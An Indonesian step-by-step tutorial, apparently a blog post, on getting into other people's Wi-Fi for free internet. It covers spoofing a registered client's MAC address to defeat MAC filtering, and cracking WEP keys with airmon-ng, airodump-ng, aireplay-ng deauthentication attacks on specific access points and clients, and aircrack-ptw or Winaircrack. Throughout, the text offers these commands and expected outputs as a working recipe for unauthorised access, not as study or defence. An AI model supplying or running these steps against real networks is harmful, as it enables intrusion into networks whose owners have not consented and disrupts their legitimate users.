Membobol MAC Address Filtering:
1. Jalankan Live CD Distro Linux BackTrack, masukkan username ?root?, lalu masukkan password ?toor?.
2. Setelah muncul prompt, ketikkan ?startx?.
3. Setelah muncul desktop environment KDE, klik tombol ?K? (di pojok kiri bawah). Pilih BackTrack Radio Network Analysis -> 80211 Analyser Kismet.
4. Lalu muncul wi...ndow ?Select Network Device?, pilih ?wifi0?. Klik ?OK?.
5. Muncul tampilan Kismet, secara otomatis Kismet akan mencari wireless client yang sedang aktif. Bila ditemukan wireless client yang aktif tetapi tidak terhubung dengan jaringan, maka akan muncul pesan ?ALERT: Suspicious client 00:02:6F:37:08:20 - probing networks but never participating.?
6. Bila Kismet berhasil menemukan Access Point yang aktif, maka akan muncul pesan ?Found IP 192.168.2.1 blackor ::00:0E:2E:C2:2C:0E via ARP?.
Keterangan:
black -> nama SSID
7. Tutup Kismet, lalu buka console untuk menjalankan tools scanning yang lain, yakni airodump.
Keterangan:
Bila kita menggunakan program scanning yang lain, biasanya program pertama akan membuat driver wireless kita ?rusak?. Untuk dapat digunakan pada program yang kedua, kita perlu memperbaiki driver tersebut (dimatikan lalu dihidupkan kembali).
8. Cara memperbaiki driver, ketik:
#airmon-ng -> untuk mengecek interface yang tersedia.
Matikan driver ?ath0? dan ?ath1? dengan mengetik:
#airmon-ng stop ath0
#airmon-ng stop ath1 -> bila interface ath1 ada.
9. Mengaktifkan driver yang baru, ketik:
#airmon-ng start wifi0
10. Bila diketikkan perintah #iwconfig , maka muncul informasi ?ath0? sudah aktif dengan Mode=Monitor.
11. Berikutnya, ketik #airodump-ng ath0
12. Dengan demikian maka kesimpulan bahwa dengan airodump mendapatkan hasil scanning MAC Address Client yang lebih cepat dibandingkan dengan menggunakan Kismet. Tetapi Client IP Address tidak bisa didapatkan, kecuali menggunakan Kismet
13. Kita juga dapat menggunakan program K-MAC(atau anda bisa merubah MAC Address melalui regedit) yang di-install pada windows untuk merubah MAC-Address Wireless kita menjadi MAC-Address salah satu client yang terdaftar pada MAC Address Filtering.
14. Yang perlu dilakukan adalah mencari informasi MAC-Address client dengan mengunakan Kismet atau airodump, catat MAC-Address tersebut, lalu jalankan K-MAC di windows dan ubah MAC-Addressnya.
15. Setelah restart komputer/laptop anda, dan mulai berinternet gratis deh??..
16. Slamat memakai fasilitas Wifi Gratis deh (^_^)
Ket :
itu kalau proteksinya hanya berupa MAC FILTER, tapi kalau ada proteksi lain seperti WPA atau WEP masih ada lanjutannya lagi...!!
Terus... Ga semua perangkat wifi mendukung cara diatas, Hanya wifi yang support untuk INJECT PAKET dan MONITORING MODE yang bisa...!!
kalau proteksinya berupa WEP lakukan cara di bawah
Menggunakan Aircrack-ptw
Akses point mengirimkan paket yang dinamakan beacon frame sekitar 10 beacon
frame setiap detiknya.Setiap paket data yang dikirimkan mengandung :
1. Nama dari network/akses point (ESSID)
2. Enkripsi yang digunakan
3. Berapa Mbit rata-rata data yang di support
4. Channel yang sedang aktif
Data-data ini lah yang digunakan oleh aircrak-ptw untuk menembus proteksi dari
suatu akses point.
Aircrack-ptw adalah generasi terbaru setelah aircrack-ng, dimana aircrack-ptw
membutuhkan waktu yang lebih cepat untuk mendekripsi sebuah key dari suatu akses
point, tetapi aircrack-ptw ini masih memerlukan komponen-komponen dari aircrack-
ng, yaitu : airodump-ng untuk mengcapture paket dan aireplay-ng untuk melakukan
berbagai serangan jika perlu, misalnya untuk memaksa target untuk mengenerate
ARP request dan lain-lain.
Contoh serangan airepla-ng :
aireplay-ng --deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0
ath0
serangan ini untuk memaksa target untuk mengenerate ARP request.
Mode serangan yang lain adalah :
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--test : tests injection and quality (-9)
mode serangan bisa diganti dengan menggunakan kode angka.
Langkah-Langkah Menggunakan Aircrack-ptw
1. Configurasi wireless card
$ airmon-ng stop ath0
$ iwconfig
pastikan respon sistem sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor
mode enabled)
berikan command airmon-ng start wifi0 9, untuk
menjalankan wireless card pada channel tertentu
$ airmon-ng start wifi0 9
maka sistem harus merespon
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
(monitor mode enabled)
berikan command
$ ifconfig ath0 up
dan pastikan sistem harus merespon sebagai berikut :
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point:
00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2. Jalankan Airodump-ng
airodump-ng --channel X --write prefix_for_capture_file
interface
$ airodump-ng --channel 3 --write tes ath0
data hasil capture akan ditulis dalam file tes, oleh
airodump-ng akan disimpan dengan nama tes-01.cap
3. Jalankan aireplay (optional)
Langkah ini dilakukan jika airodump-ng tidak mendapatkan
paket yang ditangkap, maka target dapat dipaksa untuk men-
generate ARP request
aireplay-ng --deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
deuth : jenis serangan
-a : BSSID akses point
-c : Mac Address target
15 : jumlah paket yang dikirim
4. Jalankan aircrack-ptw
$ aircrack-ptw tes-01.cap
itu kalau kalian bisa menjalankan linux, tapi kalau ga bisa... ini ta kasi cara lewat windows, cuman belum tau bisa pa ga soalnya lum penah pake cara lewat windows sih....
langsung aja deh...
Cracking WEP Menggunakan Winaircrack dengan Windows
Winaircrack adalah sebuah perangkat lunak berbasis Microsoft Windows yang
merupakan pengembangan dari software aircrack. Dimana untuk winaircrack
ditambahakan suatu user interface agar user tidak sulit lagi untuk menggunakan
beberapa programnya seperti aircrack, airdecap, airodump, wzcook.
Cara kerja dari perangkat lunak untuk melakukan cracking WEP adalah
dengan melakukan monitor terhadap seluruh paket-paket wireless dan kemudian
paket-paket tersebut akan dianalisis oleh program aircrack untuk memecahkan
enkripsi WEPnya.
Implementasi winaircrack dapat dilakukan dengan langkah-langkah berikut :
- Lakukan pemeriksaan terhadap kartu jaringan wireless yang digunakan. Tidak
semua kartu jaringan didukung oleh perangkat lunak untuk memonitor jaringan.
Kartu jaringan wireless yang banyak digunakan di laptop yang ada sekarang
sebagian besar adalah Intel pro 3945ABG. Driver dari kartu jaringan ini tidak
mendukung untuk langsung melakukan monitor paket. Untuk itu harus
melakukan downgrade driver menuju ke versi 10.5.1.72 atau 10.5.1.75.
- Langkah yang berikutnya adalah untuk menginstall program Omnipeek.
Kegunaan program ini adalah untuk menangkap paket-paket yang dikirimkan
oleh access point menuju ke kartu jaringan wireless. Biasanya paket data
dienkripsi dalam dengan WEP.
- Selanjutnya adalah melakukan monitoring terhadap paket wireless yang
dilakukan dengan menekan tombol new capture. Berikutnya pilih bagian ?802.11?
dengan tujuan untuk memilih paket-paket data apa saja yang akan dimonitor.
Monitoring dapat dilakukan untuk merekam data channel, BSSID, atau ESSID
tertentu.
- Tekan tombol ?Capture? untuk mulai menyimpan paket data. Jika dirasa sudah
cukup, maka dapat ditekan tombol ?Stop Capture? untuk menghentikan
pemantauan.
- Sinpan file yang berisi paket data dengan ekstensi .dmp
- Program berikutnya yang diperlukan adalah winaircrack. Setelah menjalankan
program ini, pilih file .dmp yang telah disimpan sebelumnya, dan kemudian klik
tombol ?aircrack the key?
- Untuk dapat memecahkan kunci, maka program aircrack memerlukan jumlah
data yang sangat banyak, dapat mencapai 300.000 data untuk enkripsi 40 bit, dan
mencapai 800.000 paket untuk dapat membuka kunci 104 bit
"Tanpa mencoba kita takkan pernah tau bahwa kita Bisa.
nambah dikit...
Ingat nama file yang anda buat sebelumnya atas? nama file saya "test-01". jadi test-01.cap
Setelah Anda melakukan ini, Anda akan melihat aircrack mulai crack password. biasanya anda harus menunggu lagi sebelum password-nya berhasil di-crack. Jika hal ini terjadi, aircrack akan menguji apa yang anda punya dan akan mengatakan sesuatu seperti "not enough IV's. Retry at 10,000."
DON'T DO ANYTHING! biarkan tetap berjalan ... ia hanya memberitahu anda bahwa akan menunda proses sampai lebih dari "IV" yang dikumpulkan. Setelah anda selesai 10.000 ini akan tandai secara otomatis dan mencoba untuk crack kembali. Jika gagal ia akan berkata "not enough IV's. Retry at 15,000." dan seterusnya sampai akhirnya gets it.
Jika anda melakukan semuanya dengan benar sampai ke titik ini, sebelum anda terlalu lama mendapatkan password!
sekarang jika password terlihat lemah, dont worry, ia akan tetap bekerja. beberapa password akan disimpan dalam format ASCII, dalam hal ini, aircrack akan menampilkan karakter yang mereka ketik di password.
Kadang-kadang, walaupun, password akan disimpan dalam format Hex dalam hal ini komputer akan memperlihatkan kepada anda Hex enkripsi dari password.
It doesn't matter either way, karena anda dapat mengetik salah satu dan anda akan terhubung ke jaringan.
catatan :
bahwa password akan selalu ditampilkan di aircrack dengan titik dua setelah setiap 2 karakter.
Jadi jika misalnya password adalah "secret", akan ditampilkan sebagai: se: cr: et
Hal ini jelas akan menjadi format ASCII.
Jika hal ini merupakan Hex sandi yang dienkripsi seperti "0FKW9427VF" maka akan tetap ditampilkan sebagai:
0f: KW: 94:27: VF
Boot kembali ke sistem operasi apa yang anda gunakan, coba connect ke jaringan dan ketik password tanpa titik dua ( : ).